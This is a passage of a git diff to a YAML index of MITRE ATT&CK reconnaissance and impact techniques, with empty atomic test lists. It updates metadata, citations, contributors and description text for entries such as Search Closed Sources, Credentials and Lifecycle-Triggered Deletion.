       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590:
     technique:
@@ -55621,7 +56303,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:23.229Z'
       name: Gather Victim Network Information
       description: |-
         Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -55637,12 +56319,10 @@ reconnaissance:
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593:
     technique:
-      modified: '2022-10-18T22:48:33.286Z'
+      modified: '2024-09-12T19:19:47.759Z'
       name: Search Open Websites/Domains
       description: |-
         Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -55651,16 +56331,16 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -55673,8 +56353,8 @@ reconnaissance:
         external_id: T1593
       - source_name: SecurityTrails Google Hacking
         description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-        url: https://securitytrails.com/blog/google-hacking-techniques
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
       - source_name: Cyware Social Media
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -55685,52 +56365,50 @@ reconnaissance:
         url: https://www.exploit-db.com/google-hacking-database
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1597:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
-      type: attack-pattern
-      created: '2020-10-02T17:01:42.558Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1597
-        url: https://attack.mitre.org/techniques/T1597
-      - source_name: D3Secutrity CTI Feeds
-        url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
-        description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
-          Intelligence Feeds. Retrieved October 20, 2020.
-      - source_name: ZDNET Selling Data
-        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
-        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
-          73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-04T13:12:14.469Z'
       name: Search Closed Sources
       description: |-
-        Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+        Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
 
         Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Barbara Louis-Sidney (OWN-CERT)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
+      type: attack-pattern
+      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+      created: '2020-10-02T17:01:42.558Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1597
+        external_id: T1597
+      - source_name: ZDNET Selling Data
+        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+          73 million user records on the dark web. Retrieved October 20, 2020.
+        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1592.003:
     technique:
@@ -55752,7 +56430,7 @@ reconnaissance:
         url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
         description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
           source code and proprietary data dumped online. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:22:46.759Z'
       name: Firmware
       description: |-
         Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -55768,8 +56446,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.002:
     technique:
@@ -55795,7 +56471,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:33:19.596Z'
       name: Software
       description: |-
         Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -55813,8 +56489,6 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.001:
     technique:
@@ -55836,7 +56510,7 @@ reconnaissance:
         url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:52:40.958Z'
       name: Social Media
       description: |-
         Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -55852,12 +56526,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.001:
     technique:
-      modified: '2023-04-14T23:29:10.396Z'
+      modified: '2024-10-10T13:45:01.069Z'
       name: Credentials
       description: "Adversaries may gather credentials that can be used during targeting.
         Account credentials gathered by adversaries may be those directly associated
@@ -55867,17 +56539,20 @@ reconnaissance:
         elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
         Adversaries may also compromise sites then add malicious content designed
         to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
-        Credential information may also be exposed to adversaries via leaks to online
-        or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
-        breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
-        Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
-        GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
-        may also purchase credentials from dark web or other black-markets. Finally,
-        where multi-factor authentication (MFA) based on out-of-band communications
-        is in use, adversaries may compromise a service provider to gain access to
-        MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
-        this information may reveal opportunities for other forms of reconnaissance
-        (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+        (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+        Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+        GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+        based on out-of-band communications is in use, adversaries may compromise
+        a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+        Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+        adversaries via leaks to online or other accessible data sets (ex: [Search
+        Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+        repositories, etc.). Adversaries may purchase credentials from dark web markets,
+        such as Russian Market and 2easy, or through access to Telegram channels that
+        distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+        2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+        Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+        for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
         or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
         establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
         and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
@@ -55889,6 +56564,7 @@ reconnaissance:
       - Vinayak Wadhwa, Lucideus
       - Lee Christensen, SpecterOps
       - Toby Kohlenberg
+      - Massimo Giaimo, Würth Group Cyber Defence Center
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -55899,7 +56575,7 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
       created: '2020-10-02T14:55:43.815Z'
@@ -55909,6 +56585,10 @@ reconnaissance:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1589/001
         external_id: T1589.001
+      - source_name: Bleeping Computer 2easy 2021
+        description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+          web marketplace for stolen data. Retrieved October 7, 2024.
+        url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
       - source_name: ATT ScanBox
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -55921,6 +56601,10 @@ reconnaissance:
         description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
           19, 2020.
         url: https://github.com/dxa4481/truffleHog
+      - source_name: Bleeping Computer Stealer Logs 2023
+        description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+          Stealer Logs in Context. Retrieved October 10, 2024.'
+        url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
       - source_name: Register Uber
         description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
           into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -55943,6 +56627,10 @@ reconnaissance:
           Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
           October 19, 2020.
         url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+      - source_name: SecureWorks Infostealers 2023
+        description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+          The Growing Threat from Infostealers. Retrieved October 10, 2024.
+        url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
       - source_name: Register Deloitte
         description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
           Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -55950,9 +56638,8 @@ reconnaissance:
         url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.003:
     technique:
@@ -56011,7 +56698,7 @@ reconnaissance:
         adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
         to access valuable information that can be exfiltrated or used to escalate
         privileges and move laterally. "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Wordlist Scanning
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56031,7 +56718,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1591.004:
     technique:
@@ -56053,7 +56739,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:39:08.904Z'
       name: Identify Roles
       description: |-
         Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56069,12 +56755,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598:
     technique:
-      modified: '2023-09-08T20:28:49.600Z'
+      modified: '2024-05-31T04:18:44.570Z'
       name: Phishing for Information
       description: "Adversaries may send phishing messages to elicit sensitive information
         that can be used during targeting. Phishing for information is an attempt
@@ -56143,7 +56827,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Avertium callback phishing
         description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
           PHISHING. Retrieved February 2, 2023.
@@ -56191,31 +56875,12 @@ reconnaissance:
         url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.001:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
-      type: attack-pattern
-      created: '2020-10-02T16:54:23.193Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1595.001
-        url: https://attack.mitre.org/techniques/T1595/001
-      - source_name: Botnet Scan
-        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
-        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
-          a Botnet. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:46:55.039Z'
       name: Scanning IP Blocks
       description: |-
         Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -56224,19 +56889,41 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Diego Sappa, Securonix
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
 
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+      created: '2020-10-02T16:54:23.193Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1595/001
+        external_id: T1595.001
+      - source_name: Botnet Scan
+        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+          a Botnet. Retrieved October 20, 2020.
+        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1590.001:
     technique:
@@ -56294,7 +56981,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.005:
     technique:
@@ -56315,7 +57001,7 @@ reconnaissance:
       - source_name: Shodan
         url: https://shodan.io
         description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:49.260Z'
       name: Scan Databases
       description: |-
         Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -56331,8 +57017,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.001:
     technique:
@@ -56358,7 +57042,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.025Z'
       name: Determine Physical Locations
       description: |-
         Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -56374,8 +57058,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.001:
     technique:
@@ -56399,7 +57081,7 @@ reconnaissance:
         url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
         description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
           Pad For Phishing Attacks. Retrieved October 20, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:43:12.843Z'
       name: Spearphishing Service
       description: |-
         Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56421,13 +57103,11 @@ reconnaissance:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 impact:
   T1561.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:32:05.064Z'
       name: Disk Structure Wipe
       description: "Adversaries may corrupt or wipe the disk data structures on a
         hard drive necessary to boot a system; targeting specific critical systems
@@ -56519,13 +57199,12 @@ impact:
         url: https://www.symantec.com/connect/blogs/shamoon-attacks
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1498.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:54:49.943Z'
       name: Direct Network Flood
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -56534,7 +57213,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
@@ -56551,17 +57229,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
@@ -56586,7 +57259,8 @@ impact:
         url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491.002:
     technique:
@@ -56624,7 +57298,7 @@ impact:
         description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
           Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
           How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:37.539Z'
       name: External Defacement
       description: 'An adversary may deface systems external to an organization in
         an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -56658,12 +57332,10 @@ impact:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_impact_type:
       - Integrity
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1499.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:51.289Z'
       name: OS Exhaustion Flood
       description: |-
         Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -56728,42 +57400,127 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
-  T1499.003:
+  T1485.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
+      modified: '2024-10-16T21:27:02.481Z'
+      name: Lifecycle-Triggered Deletion
+      description: "Adversaries may modify the lifecycle policies of a cloud storage
+        bucket to destroy all objects stored within.  \n\nCloud storage buckets often
+        allow users to set lifecycle policies to automate the migration, archival,
+        or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+        GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+        has sufficient permissions to modify these policies, they may be able to delete
+        all objects at once. \n\nFor example, in AWS environments, an adversary with
+        the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+        API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+        in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+        to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+        adversaries may also perform this action on buckets storing cloud logs for
+        [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+        Datadog S3 Lifecycle CloudTrail Logs)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Storage: Cloud Storage Modification'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+      created: '2024-09-25T13:16:14.166Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1485/001
+        external_id: T1485.001
+      - source_name: AWS Storage Lifecycles
